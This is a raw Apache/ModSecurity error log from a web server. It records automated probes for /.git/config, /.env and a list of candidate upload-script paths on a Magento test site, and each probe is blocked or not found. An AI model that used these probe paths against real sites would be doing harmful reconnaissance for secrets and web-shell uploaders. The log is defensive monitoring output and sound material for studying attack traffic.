[Tue Mar 25 02:13:42.334096 2025] [:error] [pid 2003035] [client 103.102.230.8:44586] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-IDRpygAzJdaftjjGnKQwAAAAA"]
[Tue Mar 25 02:13:42.334429 2025] [:error] [pid 2003035] [client 103.102.230.8:44586] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-IDRpygAzJdaftjjGnKQwAAAAA"]
[Tue Mar 25 02:13:42.334591 2025] [:error] [pid 2003035] [client 103.102.230.8:44586] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-IDRpygAzJdaftjjGnKQwAAAAA"]
[Tue Mar 25 18:27:46.672959 2025] [:error] [pid 2015821] [client 34.215.113.249:60958] [client 34.215.113.249] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-LnklNmZ-rL_7peAegqywAAAAc"]
[Tue Mar 25 18:27:46.673280 2025] [:error] [pid 2015821] [client 34.215.113.249:60958] [client 34.215.113.249] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-LnklNmZ-rL_7peAegqywAAAAc"]
[Tue Mar 25 18:27:46.673477 2025] [:error] [pid 2015821] [client 34.215.113.249:60958] [client 34.215.113.249] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-LnklNmZ-rL_7peAegqywAAAAc"]
[Wed Mar 26 01:00:23.998908 2025] [:error] [pid 2025026] [client 45.148.10.98:52452] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-NDlxh0eZO-LMgGPbB5WgAAAAI"]
[Wed Mar 26 01:00:23.999219 2025] [:error] [pid 2025026] [client 45.148.10.98:52452] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-NDlxh0eZO-LMgGPbB5WgAAAAI"]
[Wed Mar 26 01:00:23.999368 2025] [:error] [pid 2025026] [client 45.148.10.98:52452] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-NDlxh0eZO-LMgGPbB5WgAAAAI"]
[Wed Mar 26 04:27:36.276630 2025] [:error] [pid 2028713] [client 45.148.10.86:48778] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-N0KPWzh7sydJc3BSnTvAAAAAA"]
[Wed Mar 26 04:27:36.276924 2025] [:error] [pid 2028713] [client 45.148.10.86:48778] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-N0KPWzh7sydJc3BSnTvAAAAAA"]
[Wed Mar 26 04:27:36.277118 2025] [:error] [pid 2028713] [client 45.148.10.86:48778] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-N0KPWzh7sydJc3BSnTvAAAAAA"]
[Wed Mar 26 04:28:59.834657 2025] [:error] [pid 2028714] [client 45.148.10.86:45894] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-N0ey9zKERIcJLwOWte7wAAAAE"]
[Wed Mar 26 04:28:59.834913 2025] [:error] [pid 2028714] [client 45.148.10.86:45894] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-N0ey9zKERIcJLwOWte7wAAAAE"]
[Wed Mar 26 04:28:59.835075 2025] [:error] [pid 2028714] [client 45.148.10.86:45894] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-N0ey9zKERIcJLwOWte7wAAAAE"]
[Wed Mar 26 20:41:50.915745 2025] [:error] [pid 2038839] [client 45.148.10.98:51248] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-RYfrZUvcLK5P-oyL0U9wAAADI"]
[Wed Mar 26 20:41:50.916038 2025] [:error] [pid 2038839] [client 45.148.10.98:51248] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-RYfrZUvcLK5P-oyL0U9wAAADI"]
[Wed Mar 26 20:41:50.916208 2025] [:error] [pid 2038839] [client 45.148.10.98:51248] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-RYfrZUvcLK5P-oyL0U9wAAADI"]
[Thu Mar 27 22:26:24.814882 2025] [:error] [pid 2077858] [client 45.139.104.144:54087] [client 45.139.104.144] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-XCgCDbzXahWXHBdAarigAAAA0"]
[Thu Mar 27 22:26:24.816285 2025] [:error] [pid 2077858] [client 45.139.104.144:54087] [client 45.139.104.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-XCgCDbzXahWXHBdAarigAAAA0"]
[Thu Mar 27 22:26:24.816457 2025] [:error] [pid 2077858] [client 45.139.104.144:54087] [client 45.139.104.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-XCgCDbzXahWXHBdAarigAAAA0"]
[Fri Mar 28 10:11:36.067039 2025] [authz_core:error] [pid 2092079] [client 185.146.232.69:59168] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/upload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:11:37.672057 2025] [authz_core:error] [pid 2084696] [client 185.146.232.69:59170] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/upload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:11:50.213348 2025] [authz_core:error] [pid 2084671] [client 185.146.232.69:56362] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/upload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:11:52.219160 2025] [php:error] [pid 2092074] [client 185.146.232.69:52314] script '/var/www/magento.test.indacotrentino.com/www/setup/upload.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:30.362581 2025] [authz_core:error] [pid 2092089] [client 185.146.232.69:54574] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/uploader.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:32.651661 2025] [authz_core:error] [pid 2092077] [client 185.146.232.69:54596] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/upl.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:33.676632 2025] [authz_core:error] [pid 2092083] [client 185.146.232.69:33960] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/fileupload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:34.486714 2025] [authz_core:error] [pid 2092074] [client 185.146.232.69:44448] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/uploadfile.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:39.353628 2025] [authz_core:error] [pid 2092093] [client 185.146.232.69:44450] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/file-upload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:39.775297 2025] [authz_core:error] [pid 2092092] [client 185.146.232.69:44466] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/file-upload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:40.334646 2025] [authz_core:error] [pid 2084675] [client 185.146.232.69:44480] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/uploader.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:41.494126 2025] [authz_core:error] [pid 2092089] [client 185.146.232.69:44484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/upload-file.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:52.910126 2025] [authz_core:error] [pid 2092071] [client 185.146.232.69:40988] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/fileupload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:52.961171 2025] [authz_core:error] [pid 2092083] [client 185.146.232.69:41000] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/uploadfile.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:53.911381 2025] [authz_core:error] [pid 2092093] [client 185.146.232.69:41016] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/upload-file.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:12:54.102420 2025] [authz_core:error] [pid 2092092] [client 185.146.232.69:40992] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/upl.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:07.317476 2025] [authz_core:error] [pid 2084674] [client 185.146.232.69:55360] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/upl.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:08.903548 2025] [authz_core:error] [pid 2092112] [client 185.146.232.69:55376] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/uploader.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:21.450156 2025] [authz_core:error] [pid 2084674] [client 185.146.232.69:57516] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/uploadfile.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:21.840156 2025] [authz_core:error] [pid 2092112] [client 185.146.232.69:57530] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/upload-file.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:21.914571 2025] [authz_core:error] [pid 2092071] [client 185.146.232.69:55448] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/file-upload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:22.938168 2025] [authz_core:error] [pid 2092108] [client 185.146.232.69:55438] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/fileupload.php, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:28.612338 2025] [php:error] [pid 2092121] [client 185.146.232.69:53914] script '/var/www/magento.test.indacotrentino.com/www/setup/uploader.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:49.498304 2025] [php:error] [pid 2092106] [client 185.146.232.69:53818] script '/var/www/magento.test.indacotrentino.com/www/setup/file-upload.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:49.699079 2025] [php:error] [pid 2092108] [client 185.146.232.69:53826] script '/var/www/magento.test.indacotrentino.com/www/setup/uploadfile.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:49.771568 2025] [php:error] [pid 2092071] [client 185.146.232.69:53802] script '/var/www/magento.test.indacotrentino.com/www/setup/upl.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:49.939502 2025] [php:error] [pid 2092121] [client 185.146.232.69:53808] script '/var/www/magento.test.indacotrentino.com/www/setup/fileupload.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:14:49.996074 2025] [php:error] [pid 2092112] [client 185.146.232.69:53832] script '/var/www/magento.test.indacotrentino.com/www/setup/upload-file.php' not found or unable to stat, referer: https://economiasolidale.38121.it/
[Fri Mar 28 10:52:58.413065 2025] [:error] [pid 2092096] [client 45.139.104.144:64350] [client 45.139.104.144] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-ZxenH-_fq7UWp9Q5uSawAAAAE"]
[Fri Mar 28 10:52:58.413311 2025] [:error] [pid 2092096] [client 45.139.104.144:64350] [client 45.139.104.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-ZxenH-_fq7UWp9Q5uSawAAAAE"]
[Fri Mar 28 10:52:58.413503 2025] [:error] [pid 2092096] [client 45.139.104.144:64350] [client 45.139.104.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-ZxenH-_fq7UWp9Q5uSawAAAAE"]
[Sat Mar 29 16:05:36.124749 2025] [:error] [pid 2111973] [client 34.221.111.118:33960] [client 34.221.111.118] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-gMQKrYeosVJ2RADhTZbgAAAAc"]
[Sat Mar 29 16:05:36.125030 2025] [:error] [pid 2111973] [client 34.221.111.118:33960] [client 34.221.111.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-gMQKrYeosVJ2RADhTZbgAAAAc"]
[Sat Mar 29 16:05:36.125221 2025] [:error] [pid 2111973] [client 34.221.111.118:33960] [client 34.221.111.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-gMQKrYeosVJ2RADhTZbgAAAAc"]
[Sat Mar 29 21:05:20.336384 2025] [authz_core:error] [pid 2106540] [client 209.38.95.216:44452] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Sat Mar 29 21:05:36.458653 2025] [authz_core:error] [pid 2106814] [client 209.38.95.216:41120] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/webroot
[Mon Mar 31 22:20:04.637976 2025] [:error] [pid 2148488] [client 23.254.165.137:37104] [client 23.254.165.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z-r49FylD8vmK0E4ftjoIgAAAAI"]
[Mon Mar 31 22:20:04.644629 2025] [:error] [pid 2148488] [client 23.254.165.137:37104] [client 23.254.165.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z-r49FylD8vmK0E4ftjoIgAAAAI"]
[Mon Mar 31 22:20:04.644813 2025] [:error] [pid 2148488] [client 23.254.165.137:37104] [client 23.254.165.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z-r49FylD8vmK0E4ftjoIgAAAAI"]
[Sat Apr 05 08:55:49.580552 2025] [:error] [pid 2270270] [client 194.163.152.77:44430] [client 194.163.152.77] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z_DT9b8yip9UmJ03VneqvwAAAAQ"]
